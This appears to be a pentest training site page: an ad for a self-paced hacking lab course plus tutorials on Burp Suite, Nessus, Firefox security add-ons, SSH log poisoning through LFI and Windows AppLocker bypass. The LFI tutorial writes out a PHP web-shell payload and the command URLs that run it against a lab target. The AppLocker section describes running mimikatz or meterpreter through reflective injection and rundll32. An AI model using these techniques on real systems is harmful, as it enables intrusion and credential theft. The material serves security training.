Ultimate Hacklab – Self Paced (SP)

Ultimate hacklab – Self Paced (SP) – prep for hacking challenge lab exams like OSCP, LPT, eCPPT, and soon even the new CEH is going to be a hacking challenge lab as well.

If you really want to know what it takes to pass hack lab challenge-based exams like OSCP, LPT, eCPPT then ultimate hacklab is for you and it’s only $50.

The InfoSec Addicts Ultimate hacklab – Self Paced (SP) – is best way for you to practice the skills required for almost any hands-on lab based penetration testing/ethical hacking certification.

The Ultimate hacklab – Self Paced (SP) – gives you the opportunity to follow along with a structured and very detailed training program, and/or make your way through the labs and just ask for help whenever you get stuck. You can run almost any tool and try almost attack in the environment. The class is self-paced. You can sign-up ANYTIME, and start IMMEDIATELY.

The program outlines how to create your own lab environment or you can connect to the InfoSec Addicts lab environment with almost any platform (Windows, Mac OS X, Kali Linux, other Linux distros) to go through the lab exercises.

Class syllabus:

  • Module 1: Connecting via VPN to the lab network
    • Connecting to the VPN with Windows
    • Connecting to the VPN with Mac OS X
    • Connecting to the VPN with Linux
    • Connecting to the VPN with Kali
  • Module 2: Scanning
    • Nmap
    • Net-Discover
  • Module 3: Module X: Enumeration
    • nmap NSE
    • rpcinfo/showmount
    • nbtstat
    • enum4linux
  • Module 4: Brute-forcing
    • Hydra
    • Medussa
  • Module 5: Vulnerability Scanning
    • Nessus
    • OpenVas
  • Module 6: Attacking web servers/web apps
    • Manual XSS/SQL Injection/LFI/RFI
    • Nikto
    • Dirbuster
    • Burp Suite
    • w3af
    • Arachni
  • Module 7: Compiling/Modifying Exploit code
    • Compiling code in Windows
    • Compiling code in Linux
    • Finding offsets
    • Changing out shellcode
  • Module 8: Client-Side Exploitation
    • Metasploit
    • Social Engineering Toolkit
  • Module 9: Transferring files
    • FTP
    • TFTP
    • VBscript
    • Debug,exe
    • wget/linux/bitsadmin
    • PowerShell
  • Module 10: Privilege Escalation
    • Linux
      • SUID binaries
      • Shell escapes
    • Windows
      • Identifying vulnerable services/misconfigurations
      • beR00t.exe
  • Module 11: Data-mining a compromised host
  • Module 12: Hashcracking
  • Module 13: Pivoting
    • Netcat/Socat pivot
    • SSH Pivot
    • Metasploit pivot
  • Module 14: Lateral movement
    • psexec
    • smbexec
    • winexe
  • Module 15: Data Exfiltration
    • ICMP Tunneling
    • DNS Tunneling
  • Module 16: Reporting

 

Lab Network Access

Targets in the lab network will change on the 1st of every month. Students have the option to purchase 1 months access to the lab environment for $25.

 

Students will receive:

  • Up to 124 hours of CPEs (24 CPE for the actual training and the rest come from labs and challenges completed by the students)
  • Several virtual machines
  • Courseware access
  • Lab Manual
  • Lab access

 

Class Videos

Each course module has a corresponding video that demonstrates the task being performed. So you can see each individual lesson’s skill or task that is being described actually being performed.

Support

Each student will have access to an InfoSec Addicts Group (infosecaddicts.com) for the class. Additionally, this is where they can work with other students on lab exercises, homework, and challenges. An InfoSec Addicts class mentor will be assigned to the group to answer questions (allow one day for responses). Likewise, a Customer Relationship Manager will get assigned to the class to manage questions and support issues.

 

Class Schedule

The class is self-paced. You can sign-up ANYTIME, and start IMMEDIATELY.

Fill out this form below to sign up for the class.

$50.00Add to cart

 

 

BurpSuite

What is BurpSuite?

Burp Suite

When it comes to the field of securing web applications, BurpSuite arises shiningly. PortSwigger Security is the responsible company of producing BurpSuite developed in Java programming language. In fact, there are two versions of this important security tool:

  1. A free version which is up for any free downloads online. It is named as the Free Edition.
  2. And there is the other version which is of course not free and referred to as the Professional Edition. It is usually purchased after having a period of the free trial.

The purpose of BurpSuite was to have a complete web application solution for the entire checking and solution process related to the web application. One of the most interesting issues about BurpSuite is that a mobile application was developed having the same tools as the desktop versions to be utilized on new IOS versions.

What are the tools that BurpSuite offers?

Burp Suite

Let’s now have a look at the tools which BurpSuite provides its users with. Actually, there are several tools offered by Burp Suite. They facilitate the penetration testing to establish the security of a web application.

  1. It could work as an HTTP proxy: A web proxy server is offered by BurpSuite, This is in order to get the man-in-the-middle attack performed between a client using his/her own browser and a web server at the other end of the connection. Following this, any raw traffic running between the two ends could then be simply inspected and modified afterward.
  2. It offers a great Scanner. A scanner which scans for the web application’s vulnerabilities is also offered by BurpSuite. It has the capability to make such scans automated for finding such vulnerabilities. This is considered as a very important aspect regarding web application’s penetration testing and security.
  3. Intruder – The importance of such a tool lies in the fact that it has the ability to launch attacks on a vulnerable web application. There are in fact several methods to perform such attacks through the Intruder tool. They include SQL Injections, Cross Site Scripting, parameter manipulation and vulnerabilities susceptible brute-force attacks. Such tool searches for such attackable vulnerabilities and whenever detected, then the attack is up for the launching. A configurable algorithm is provided to this tool’s user in order to get HTTP requests generated then.
  4. Spider – If it is manual mapping that is to be used, such tool makes it easy and really fast for its user to map the content of an application with its functionalities. A web application can be crawled by this tool in fact.
  5. Repeater –  A user can get an application tested by such tool. To elaborate, the methodology to do such testing is that the server gets a modified request from the tool, then another request reaches the application. The results are observed thereby to understand the behavior.
  6. Decoder – Such tool is very interesting especially when it comes to encoded data. It has the ability to recognize and detect different types of formats used for the encoding purposes, depending on some exciting techniques. Encoded data can get back to its canonical format in this manner. This could happen the other way around such that raw data gets transformed into forms that are hashed and encoded.
  7. Comparer – Such tool has the ability to compare between two pieces of data and detect any differences between both of them.
  8. Extender – The interesting point about this tool is that it allows for the Burp Suite to get utilized by a third-party code or security testers afterward. This way, extensions of Burp Suite can get loaded for more security functionalities.
  9. Sequencer – Such tool helps with the process of getting the quality of randomness analyzed and measured inside a sample of data items. In this way, session tokens or other data which is to be secured and not able to get precited becomes predicted on the other hand.

Examples of such vital tokens are anti-CSRF tokens, password reset tokens, and

others. They are definitely set to never get detected and discovered.

Let’s now get started with Burp Suite

  • How to launch BurpSuite?

  1. It is important to note that the software is written in Java programming language. The extension in which such software is an extension of .jar which is, in fact, a standalone Java extension.
  2. Browse the website of PortSwigger.net and get the free edition downloaded from there.
  3. In case you are however a professional user, you should then get logged in with your credentials and get the Professional Edition downloaded now.
  4. For the jar file to work, a Java environment is required, which is at the end of the day a replacement of the necessity for any contents of such file to get unpacked.
  5. Make sure that Java is installed before beginning to use Burp Suite.
  6. Get the command prompt opened using different methods according to your operating system:

Burp Suite

 

  • If you are a Windows user, then the start button should be pressed on then “cmd” should be typed into the search box. Then the program should be clicked on to get open now.
  • If you happen to be a user of Mac OS X, then you should press “Applications” which is in fact inside the system dock. Now, click on “Utilities” from which “Terminal app” should be chosen.
  • However, if you are a user of Linux system, then the “Console” or the “Shell” should be chosen under the lists of applications.
  1. Inside the command prompt, you just opened, type the following command now “java –version”
  2. In case that Java is already installed on the machine which is used, then the message which is to appear is the following message: “java version “1.6.0_21”. It is important to note that the needed version of Java is at least 1.6
  3. Now, the .jar file of Burp can be clicked on in order to open the Burp file directly. However, launching Burp using the command line grants whoever doing so with the privilege of much controls and several utilities upon execution. Such controls are for example like specifying how much memory should be dedicated for the sake of running Burp Suite on the machine.
  4. Let’s try the following command for instance:
java -jar -Xmx1024m /path/to/burp.jar

This command will accordingly specify an amount of 1024 Mbs for Burp while the Burp file is located in /path/to/burp.jar

  1. Now, a splash screen should get displayed at the moment to indicate that it works perfectly.

Let’s get to select a project

There are actually three categories to choose between when it comes to opening a project or creating a new one:

  1. Temporary Project: If there is no necessity to get the data saved and used afterward, then this category works the best. All data is however saved on the volatile memory.
  2. New Project on Desk: For this option, a Burp project fie is required. A new project is created consequently and a name should be given to such a project.
  3. Open existing project:

This simply allows for opening an existing project. However, the tools of Spider and

Scanners are by default paused at such moment.

References

https://en.wikipedia.org/wiki/Burp_suite https://wiki2.org/en/Burp_suite”https://wiki2.org/en/Burp_suite
https://wiki.archlinux.org/index.php/Burp_suite”https://wiki.archlinux.org/index.php/Burp_suite
https://portswigger.net/burp/help/suite_gettingstarted.html”https://portswigger.net/burp/help/suite_gettingstarted.html
https://portswigger.net/burp/help/suite_usingburp.html”https://portswigger.net/burp/help/suite_usingburp.html

How to perform SSH Log Poisoning through LFI to exploit a web server?

It is important to get to know a great method to exploit a web server which essentially suffers from local file inclusion (LFI). Let’s assume we are working on a Metasploitable 2 target and the operating system to run the attack is Kali Linux.

LFI

The following steps explain how one can perform this process on Kali Linux:

  1. Open the Kali Linux terminal.
  2. Connect the target through using SSH service. The following command can be in a great use then
    ssh [email protected]
  3. Check the permission of auth.log file beforehand using the following command
    ls -l /var/log/auth.log
  4. Most of the time the auth.log file appears to have the read-write permission. They should appear like the following:
    -rw-r—r—r—syslog adm …...
  5. We can now have access to the file and read all read all its logs through the following command:
    tail -f /var/log/auth.log
  6. We can walk through the logs and check the specific logs of the user named “mfsadmin”.
  7. Now, let’s attempt to connect to the web server using a counterfeit username. One can use the following command for an invalid login
    ssh [email protected]
  8. The permission should now be denied and shown clearly as follows
    "Permission denied, please try again."

    LFI

  9. Then, get back to the auth.log file and ensure whether such fake or invalid attempt has been recorded or not. It should show that such invalid user tried to get access. The following should display if the user used the IP address of 192.18.1.104
    "Failed Password for invalid user hacker from 192.168.1.104 port 56566 ssh2"
  10. This means that a login whether a passed one or an invalid one, it will get recorded and shown inside the logs. Then, let’s now try passing a PHP code as an invalid user and see how the reaction of such deed will be. The following command provides a PHP invalid user login attempt.
    ssh ‘<?php system($_GET[‘c’]); ?>’@192.168.1.105
  11. Then, get back again to the auth.log file and make sure whether such fake or invalid attempt has been recorded or not. It should show that such invalid user tried to get access. The following should display if the user used the IP address of 192.18.1.104
    "Failed Password for invalid user  <?php system($_GET[‘c’]); ?> from 192.168.1.104 port 49642 ssh2
  12. Let’s assume that you have previously created LFI and now we try to browse to it using the following link:
    192.168.1.105/lfi/lfi.php
  13. An error will appear looking like local file inclusion vulnerability.
  14. The auth.log file should get included as a parameter now through the following URL inside the browser:
    192.168.1.105/lfi/lfi.php?file=/var/log/auth.log
  15. Note that a warning will display, with the following text:
    Warning cannot execute a blank command
  16. Let’s discuss what this actually means. The PHP code which previously contained the CMD comment has already been injected. Any command can then get sent as a parameter now.
  17. Let’s now browse into
     "192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ps"
    

    this will dump the data of auth.log besides executing a comment given through cmd

  18. Let’s now browse into
     "192.168.1.105/lfi/lfi.php file=/var/log/auth.log&c=pwd". 
    

    This way, the results can display inside the window.

What is Kali Linux? 

One of the most important security tools to understand and work on very well is, in fact, Kali Linux. But let’s discuss its benefits in a nutshell.

LFI

⦁ Penetration testing and digital forensics always consider such tool as an essential one for their purposes.
⦁ It provides its user with a variety of tools and functions which fall into thirteen categories:
⦁ Information Gathering such as Dmitry
⦁ Vulnerability Analysis like Inguma
⦁ Tools for exploitation as Metasploit Framework
⦁ Wireless Attacks like WIFI Honey
⦁ Forensics such as Binwalk
⦁ Web Applications like Skipfish
⦁ Stress testing like FunkLoad
⦁ Sniffing and Spoofing as Wireshark
⦁ Password attacks like done by TrueCrack
⦁ Maintaining Access such as Intersect
⦁ Hardware hacking performed by dex2jar for instance
⦁ Reverse Engineering that can for instance use Apktool
⦁ Reporting tools as MagicTree

What is Metasploitable?

LFI

Basically, Metasploitable is a vulnerable machine which is intended to be used for the sake of purposes such as being trained, test an exploit or even general target practice. The unique aspect about Metasploit is that it has the capability to check vulnerabilities on the layer of the operating system and network services, not merely the applications layer.

Metasploitable 2 is like a good bag which contains a bunch of security tools such as Metasploit. A production environment usually has Metasploit 2 to help them with the process of examining and practicing the exploits of vulnerabilities.

Metasploitable 3 is even a newer version of Metasploitable. It is a virtual machine essentially built from the ground up with a lot of security vulnerabilities.  Through such version, Metasploit is the security tool utilized to test exploits. The BSD-style license is the one under which Metasploitable3 got released originally.

The following are requirements to run Metasploitable:

  1. An operating system which is capable of running all of the required applications listed below.
  2. VT-x/AMD-V Supported Processor recommended
  3. 65 GB Available space on drive
  4. 4.5 GB RAM

So we have mentioned that Metasploitable basically uses Metasploit in the first place. Let’s talk in the last few lines about Metasploit in fact.

LFI

The Metasploit Project is a computer security project that shows the vulnerabilities and aids in Penetration Testing. Penetration testing refers to an authorized simulated attack on computer system. It looks for security weaknesses, and Instruction Detection System (IDS) signature, which on the other hand monitors a network or systems for malicious activities. The most related sub-project is the famous open source Metasploit Framework, which is the most common exploit development framework in the world. I will elaborate on this framework idea later on in this article.

Finally, one could use Metasploit to perform some legitimate and unauthorized accesses and activities on computer systems. In this regard, it is no different from any other commercial similar products such as Immunity’s Canvas or Core Security Technologies. Metasploit, however, is commonly applicable in breaking into remote systems or test for a computer system vulnerability.

References

http://www.hackingarticles.in/beginner-guide-ssl-tunneling-dynamic-tunneling/

http://www.hackingarticles.in/perform-local-ssh-tunneling/

https://en.wikipedia.org/wiki/Tunneling_protocol

https://en.wikipedia.org/wiki/SOCKS

https://en.wikipedia.org/wiki/Comparison_of_proxifiers

https://en.wikipedia.org/wiki/TUN/TAP

http://www.hackingarticles.in/perform-remote-tunneling/

http://www.hackingarticles.in/beginner-guide-ssl-tunneling-dynamic-tunneling/

http://linux.byexamples.com/archives/115/ssh-dynamic-tunneling/

https://ypereirareis.github.io/blog/2016/09/19/ssh-tunnel-local-remote-port-forwarding/

https://coderwall.com/p/pmf0tw/understand-local-remote-and-dynamic-ssh-tunneling

http://www.hackingarticles.in/time-scheduling-ssh-port/

http://www.hackingarticles.in/web-server-exploitation-ssh-log-poisoning-lfi/

http://www.hackingarticles.in/metasploitable-3-exploitation-using-brute-forcing-ssh/

http://www.hackingarticles.in/secure-port-using-port-knocking/

https://chamibuddhika.wordpress.com/2012/03/21/ssh-tunnelling-explained/

https://en.wikipedia.org/wiki/RealVNC

https://nmap.org/

http://resources.infosecinstitute.com/metasploitable-2-walkthrough/#gref

https://www.vulnhub.com/entry/metasploitable-2,29/

https://github.com/rapid7/metasploitable3

Nessus

What is Nessus?

Nessus is a renown software from Tenable Network Security. It specifies in monitoring and scanning for security vulnerabilities. The initial release of this software was free to use for non-enterprise clients. According to sechtools.com, it ranked the first vulnerability scanner and the most common among its counterparts in years of 2000, 2003, and 2006.

Nessus

Nessus

There are four main types of Nessus software. There is Nessus Cloud which represents a Software as a Service (SaaS) platform. Another type is Nessus Manager, which serves as a physical or virtual vulnerability manager. Nessus Professional is a version that could run a device such as a laptop device or a Personal Computer (PC). Finally, the free type of Nessus is its Home which is for home-user customers.

Historical Overview

Nessus

In 1998, Renaud Deraison aimed to create a free remote security scanner and publish it online, making it available for all people around the world. Back then, the project was an open source project. This was until the year 2005 when it turned to a closed source owned by Tenable Network Security, cofounded by Deraison.

In 2005, Tenable Network Security established that more that seventy-five thousand organizations around the world used it. At that time, it was Nessus 3 which existed, and until the moment its engine is free to use, but it costs $100/month per scanner. Nessus 3 supports Microsoft Windows, Unix, Linux, and some other operating systems.

However, before Nessus 3 existed Nessus 2 which required an agent to operate its functions on several operating systems. There is no need to mention how slow it was to use it back then. Nessus 2 operated under the General Public License (GPL), paving the way for developing similar projects like OpenVAS and Porz-Wahn, which are both open source projects. Despite this fact, there was an implementation of many updates on this version of Nessus by Tenable Network Security even after Nessus 3 came to existence.

In 2008, status got better to some extent from the original company’s and users’ perspectives. when a free version for home users became available to plugin feeds. Meanwhile, enterprises had –and still have—to pay for using the software for commercial purposes.

In 2009, Tenable Network Security released Nessus 4. It would later release Nessus 5 in 2012 and later the newest version, Nessus 6, in 2014.

What does Nessus do?

Nessus

Let’s now discover what features it has, and to what extent such software could be beneficial for security purposes. First of all, let me begin with some services that Nessus 3 and its descendants are able to provide their holders with.

  • It automaticity scans for vulnerabilities and analyzes them in order to prioritize recommended remediation.
  • Every-day plug-ins are fed to customers’ computers to update them with any new emerging vulnerabilities –being revealed in public– that could be detected subsequently.
  • Supports Supervisory Control and Data Acquisition (SCADA) audits.
  • Supports audit on Embedded Devices
  • It offers mobile device scanning.
  • A web application and a cloud environment are also available for harnessing by it.
  • It could search for any sensitive data such as social security numbers, credit card details, and much other confidential information.
  • Nessus 3 offers a means of technical support for an organization
  • It can audit Anti-Virus configurations.
  • It can audit Federal Desktop Core Configuration (FDCC) standards
  • Nessus 3 supports the audit of The Payment Card Industry Data Security Standards (PCI-DSS) as well.

Now, why don’t we break down the types of vulnerabilities detectable when scanning through it?

  1. Vulnerabilities related to passwords such
    • System accounts having no passwords
    • System accounts having default passwords or those consisting of those passwords provided on initial setup or after reset
  2. Vulnerabilities with which remote exploitations could grant access to sensitive data
  3. Misconfiguration vulnerabilities such as missing software patches, or open mail relay
  4. Vulnerabilities related to Denial of Service attack of TCP/IP stack via sending some mangled packets through the network
  5. Arrangements for conducting PCI DSS audits

Is Nessus actually necessary?

The answer to this question is logically deductible after summarizing its unique capabilities. These abilities could help determine the reasons for choosing it.

  • Some endpoint agents could be configured on a device:
    • They allow for offline scans and report results to Nessus Cloud and Nessus Manage administrators whenever an internet connection gets established.
    • They have also the ability to scan devices for malware.
  • Upon buying Nessus professional for a particular organization, or even hosting on Nessus Cloud and Nessus Manager, technical support for any issue related to it is always available.
  • On-demand – and completely free– training are offered either physically in specified centers of Tenable Network Security, virtually, or even on-site where the customer is based.
  • Nessus console has an enhanced user-friendly Graphical User Interface (GUI).
    • One can apply Security policies by a bunch of clicks and checks.
    • Email notifications could be targeted by administrators of an organization for scan results and recommended remediation to apply.
    • Preconfigured reports or customized ones could be run as a host by administrators.
  • It utilizes the Representational State Transfer Application Program Interface (RESTful API) to easily integrate into any organization.
  • CyberArk is supported to be integrated with by both Nessus Cloud and Nessus Manager for the sake of credential management, with various patch management systems. To illustrate some of the companies providing the entitled Systems:
    • For computer systems: Microsoft, Dell, IBM, and Redhat.
    • For mobile systems: Apple, Microsoft, AirWatch, and MobileIron.

Given all of these premises and depending on several business practices, my answer to the initial question is definitely yes. All of the aforementioned characteristics distinguish it from all of its other software counterparts. Some other scanners may have one of these characteristics, yet it is almost impossible so far to find something containing all of such powers.

How to use Nessus for Penetration testing?

Nessus is not actually a penetration testing tool. However, its scanning results –when combined with all penetration testing tools—could be an indicator of the security risk of a computer system. Testing tools which could be for example utilized in this regard are Immunity CANVAS, Core IMPACT, and definitely Metasploit. In addition, in the case of any password-related vulnerability, it has the power to use the password cracking tool named Hydra to get the password and get access afterward.

One, for instance, could harness the tools of Nessus Home to the maximum to help with penetration testing. Nessus Home is a free version as mentioned before.

 

  1. Download it and install it.
  2. Set Up Nessus Account and Activate the installed copy through the activation codeNessus
  3. Start a Vulnerability ScanNessus
  4. Understand the results: In case we choose Basic Network Scan, check through each given device Internet Protocol (IP) address and understand from where the vulnerabilities are actually originated from.NessusNessusNessus
  5. Discover how to exploit such devices. Though it doesn’t have a specialty in this matter, it will show you where to go.Nessus

References

https://en.wikipedia.org/wiki/Nessus_(software)

http://lifehacker.com/how-to-use-nessus-to-scan-a-network-for-vulnerabilities-1788261156

http://searchsecurity.techtarget.com/feature/Tenable-Nessus-Vulnerability-Scanner-Product-overview

https://www.quora.com/Is-Nessus-a-must-use-software-for-penetration-testers

https://www.google.com.eg/search?q=Nessus&source=lnms&tbm=isch&sa=X&ved=0ahUKEwjhztGv_-bUAhUJ0RQKHWLoD4kQ_AUICigB&biw=1366&bih=613#imgrc=kyqbSwXHfvlyXM

https://www.google.com.eg/search?q=nessus+cloud&source=lnms&tbm=isch&sa=X&ved=0ahUKEwjXkujP_-bUAhUNrRQKHWbfB40Q_AUICigB&biw=1366&bih=613#imgrc=dd_OH6sGoySy4M

https://www.google.com.eg/search?q=nessus+home&source=lnms&tbm=isch&sa=X&ved=0ahUKEwi0htKKgOfUAhVH0RQKHXSSC-UQ_AUICygC&biw=1366&bih=613#imgrc=EBTfueJXu2OXmM

https://www.google.com.eg/search?q=nessus+professional&source=lnms&tbm=isch&sa=X&ved=0ahUKEwjJ-9-gwOnUAhVFshQKHX5bDfwQ_AUICigB&biw=1366&bih=662#imgdii=r9p2iinxkEBh4M:&imgrc=O2Sm1jLf8kdcKM:

How to Bypass a Windows AppLocker?

Quick Background on AppLocker

First, we need to get an insight into what an Applocker is and its mechanism before going through the technical details.

AppLocker is basically a software from Microsoft that grants some users specific privileges while preventing other users from the same privileges. In other words, some users have the freedom to open some particular applications on the operating system whereas some others don’t have the rights to open these applications. For instance, one user could freely run Internet Explorer, and another cannot even open it. Most sensitive machines such as Automated Teller Machines (ATM) and computers inside important organizations all use AppLocker

AppLocker essentially covers five main categories of files:

  • Executable files coming in .exe and .com extensions such as ipconfig.exe
  • Installer files which are utilized by Windows to get any new software installed on the computer or the machine; such files come in .msi, .msp, and .mst extensions
  • Script files which come in .ps1, .vbs, .vba, and .cmd and .js extensions
  • Packaged Apps which one installs through Microsoft Store
  • DLL files which come in .dll and .ocx extensions

Throughout this article, the main focus is in the common file formats used when talking about security restrictions and privileges using AppLocker. Therefore, I will mostly maintain executable files, installers, and script files.

How to activate AppLocker on your machine

  1. Open Administrative Tool -> Services
  2. Get through the Group Policy Editor which differs between one domain controller (gpmc.msc) and on (gpedit.msc) on local machines
  3. If the last steps did not work, type “Edit group policy” inside the search text box inside the menu bar.
  4. Under “Security Settings” open “Application Control Policies”Windows AppLocker
  5. Press “Configure Rule Enforcement” in order to choose among the five aforementioned application categories, and apply an appropriate filtering accordingly.
  6. Three main points should now determine the rules which should govern the usage of each of those categories:

a. Execution Path:

By default, all executable files and scripts which reside inside the following two directories “C:\Windows” and “C:\Program Files” are allowed. If this was not the case for such files in these locations, the system would not boot in the first place.

b. Information about the Publisher:

Sometimes AppLocker relies on the vendor’s public key to sign a specific executable file as binary files. Based on this, AppLocker may decide to get such file allowed or denied.–Windows AppLocker

c. File Hash:

AppLocker stores Message Digest 5(MD5) hashes of executable files, and therefore depends on them to decide whether to allow a certain file or not. Although this aspect requires a great deal of memory usage, it is essential for AppLocker in order to prevent any hazardous executable file from running.

Consider a Standard Setup

When the user doesn’t change any of the default rules over the files, we are left with all the executable files (other than those located at “C:\Windows” and “C:\Program Files”) without the ability of running them anywhere on the machine. This is a problem because for instance, we cannot run Meterpreter.exe.

There is, in fact, a way out of this problem. Think about this way; executable files aren’t allowed to run at several locations inside the machine while other locations don’t prevent running the same executable files. If these latter locations could become known by you, you as a standard user with no admin privileges will enjoy running any desired executable files inside the machine; it seems straightforward, right? Well, it is actually a tedious work to go through each location and investigate it manually to see the applied rules on it. What is the solution then?

Basically, PowerShell script is an appropriate method to automatically identify where it is accessible to write –to run our executable file— This basic installation will let “C:\Windows\Tasks” and “C:\Windows\tracing” writable by everyone.

  • In order to make the PowerShell show us these files, “Get-Content” and “Invoke-Expression” commands are to be used.Windows AppLocker

  • Once we get to know these files are writable, copy the desired executable file “mimikatz.exe” or “meterpreter.exe” or whatever executable file you want to run on the machine.
  • Run the desired executable file now. Note that the reason for having an executable file lies in it simplicity having a certain malware or a custom tool for example. However, it does not require an executable file for an attack; this could be done simply using Invoke-Expression through which we bypass any execution path restriction.Windows AppLockerWindows AppLocker

Now, consider this case instead. You have searched for writable directories, and weren’t able to find any. How would you react then? If we could store the executable file that we want somewhere in the memory and then jump to its address/location without the need for any directories, then, we would solve the problem.

  • Use a PowerShell variable to store the executable fileWindows AppLocker
  • Make use of PowerSploit framework by using its function called Invoke-ReflectivePEInjection. It will load this file into a memory location to which you should jump in order to run the file.Windows AppLocker

Consider a more advanced Setup

What if the user was aware of the vulnerabilities of the default rules? He rather restricted the usage of cmd.exe and PowerShell.exe to get ascertained that all the previous steps which rely on these applications could never be used.Windows AppLocker

  • Look for something forgotten by the user to be blocked
  • In this case, the user took care of all the Windows-64 tools and applied what rules he wished for on them. Still, he overlooked Windows-32 tools, which would be the way to go instead. Simply use the “C:\Windows\SysWOW64\” location to open the PowerShell from where we could manipulate and play around with our executable file as mentioned before.Windows AppLocker
  • Even if we merely search for “PowerShell.exe”, we will find several versions of PowerShell each having its unique hash. There would be still a plenty of PowerShells having hashes other than the blocked one.Windows AppLocker
  • If all of the above-shown instances of PowerShell are blocked along with cmd.exe, there is still a way out.
  • Use “C:\Windows\System32\wbem\wmic.exe”. This utility could make us very close to know information about the system. It will not be that easy of course as it was on the PowerShell; nevertheless, it still provides us with an alternative.Windows AppLocker

Consider a more advanced Setup

The user could be capable enough to block all of the previous methods. Even WMIC cannot run in this case. There is always a way out!

  • Note the files of type DLL which are not blocked
  • Search for a DLL implementation of PowerShell online
  • Download it into any folder
  • Run the file using the utility of “C:\windows\system32\rundll32.exe”
  • To execute it: type the DLL and its entry point function. In our case, type “rundll32.exe PowerShdll.dll,main”Windows AppLocker

References:

http://www.hacking-tutorial.com/hacking-tutorial/how-to-bypass-windows-applocker/#sthash.yGAUxClg.dpbs

https://technet.microsoft.com/en-us/library/ee460956(v=ws.11).aspx

 

Finally, check out my other article on Transferring files from Linux to Windows (after exploit).

FIREFOX PLUG-INS REVIEW

FIREFOX PLUG-INS EVERY SECURITY PERSONNEL NEEDS TO KNOW 

Plug-ins, additional features in a browser, enhance the user experience. Firefox is one browser that supports a variety of plug-ins. These could include video scripts, animations, and other elements. Browsers alone do not typically support these.

Understanding how plug-ins work and interact with browsers is important. This is because most malicious attacks use plug-ins as a cyber-trespassing and theft tool. Moreover, we will secure our systems properly by understanding how plugins work.

Plug-ins have a multitude of purpose. These are used to ensure safe browsing, information grabbing, entertainment purposes, among other uses. Below are useful plug-ins one can use to gather information and carry out penetration testing.

FoxyProxy Standard

This add-on is a proxy management. It improves the browser’s proxy capabilities as well as providing analysis of URL patterns. It also switches the network connection transversely among different proxy servers. One sees an animated icon on the browser when a proxy is in use.

FoxyProxy Standard has a history tab that logs the servers used. It is possible to set the plug-in for use when necessary based on the URL’s nature. This, as a result, makes the add-on more efficient than other proxy management plug-ins.

Firefox plug-ins

Firebug

This is a Firefox web development tool embedded into the browser function. It enables the editing of HTML, JavaScript or CSS directly from the live page. The changes thereafter directly seen after saving.

This plugin helps in pinpointing web application and web page vulnerabilities. It opens a window to launch a penetration attack and can collect a user’s data. It also enables inspection of HTML elements in the page.

The CSS tab functions to check and edit the style of the page. It is a convenient way to edit the look of the page and consequently view the changes immediately. Copying of Codes is further possible for further development outside the browser. It also enables scaling and margin setup to align text and images. Additionally, it can monitor network activity. If a page is loading slowly, you can check what causes the lag from this plug-in. Firebug also has a powerful JavaScript debugger that identifies errors and measures performance of a script.

Furthermore, Firebug monitors network activity. If a page is loading slowly, you can check what causes the lag from this plug-in. Firebug has a powerful JavaScript debugger that identifies errors and measures performance of a script.

The DOM tab found in the Firebug panel helps identify code tags and edit them. This plugin also allows the easy management of cookies. All accepted cookies are reviewed as they are listed according to value.

Firefox plug-ins

Firefox plug-ins

Live HTTP Headers

Live HTTP headers are effective penetration tools used for troubleshooting, tuning and analyzing a website. This plug-in contains data such as language, caching, authorization, and character set. Normally, these data are invisible. This plugin, however, enables access to this information.

To obtain header information, right-click on the page and select “View Page Info.” Next, click the header tab on the new pop up window to view page information. Press ‘”Ctrl+Shift+A” to replay the header.

Firefox plug-ins

This plug-in is considered as a sniffer application. That is because it can view HTTP header exchanging. You can see what is happening and analyze it, and stop packet capture. To change header or URL values, you only need to highlight, edit and replay a packet. Finally, this works on both Windows and Linux.

Hackbar

Hackbar is another penetration testing tool. It appears as an extension of the address bar. Hackbar is capable of performing POST data manipulation, encryption, and encoding. This helps test XSS holes, web security, and SQL injections. Moreover, one can work on Hash algorithms, Base64 Decoding, and other data types with Hackbar.

Firesheep

Firesheep gives you the capability to attack HTTP sessions of other users accessing the same network. This plugin shows all accounts found in the network. This uses the cookie unique to a logged in account. This a result of websites protecting initial log-ins but leaving the rest of the log-ins unprotected.

These cookies are readily available for use by attackers in any open network. Firesheep captures users visiting an unsecured page. Double clicking a seized item, logs you in as that user.

Tamper Data

Tamper Data is used to edit and view HTTP requests. This add-on records ongoing requests for display on a particular website. The window shows details such as time, total duration, size and other information. Most noteworthy is that the data is copied to an external file for future reference.

Firefox plug-ins

CryptoFox

CryptoFox is an encryption-decryption plug-in. It appears as an extension of the address bar. Moreover, it has two fields. The first one corresponds to the text that needs encryption. The next field is a selection of the desired encryption method.

CryptoFox performs over 40 techniques. Furthermore, it has a dictionary attack reference for MD5 passwords. To test this plug-in, here is an AES128-bit encryption. Let’s use the AES 128-bit decrypt method for this.

Firefox plug-ins

Type “helloworld!” in the text field. Next, select AES 128-bit encryption and later on press the decode button. Thereafter, enter the “passwd” when asked to enter a password. This password will also be utilized for the decryption later. Especially relevant is the that we will use this password for decryption later.

Firefox plug-ins

After entering your password, Click OK. Afterward, this encrypts the text which is later displayed in the first field. For cross checking purposes, select the AES128-bit Decrypt and use the same password.

Firefox plug-ins

Anonymox

Anonymox is a useful plug-in that enables anonymous browsing in Firefox. This plugin creates a virtual identity. That is so because it protects you, giving access to commonly banned sites on your network. It also helps one in changing their IP address.

In addition, one can tweak Anonymox’s customizable settings per every website. Bypassing GeoIP blocks is also possible through this add-on. This is possible as it changes your origin location. This, as a result, gives you access to banned sites in your country.

The Anonymox acts as a middle ground. The request is sent to the plug-in and later, the plug-in itself replies to the web host. It enables you to select proxy identities.

Firefox plug-ins

SQL Inject Me<

This penetration testing plug-in identifies vulnerabilities in SQL injection. It looks for database errors and loopholes. This, in turn, helps to carry out an attack through sending escape strings in the database. A completed test result shows errors and the options.

Firefox plug-ins

Certificate Patrol

Certificate Patrol helps pinpoint man-in-the-middle attacks. This is done by checking SSL certificates. It shows whether anything within the certificate is modified during an exchange. This add-on uses pop-ups to inform you SSL details and lets you choose to save or not. If saved, the plug-in can cross-check for disparities.

To verify a certificate, the plug-in shows old and new versions of the SSL. You must be cautious in finding and comparing for errors. Click the Reject button should you find anything suspicious.

Firefox plug-ins

FoxySpider

Web crawlers are useful. FoxySpider in Firefox is one such add-on that organizes a website. It displays and arranges videos, music, images, etc. according to file types. It is useful in gathering information about a website.

An icon on the left side of the address bar indicates that FoxySpider is installed. There are three settings for this tool. Left clicking organizes the files, while right-clicking opens a search configuration window. Middle clicking on the icon, on the other hand, pops up a window to set requirements such as keywords or specified URLs.

Firefox plug-insFirefox plug-ins
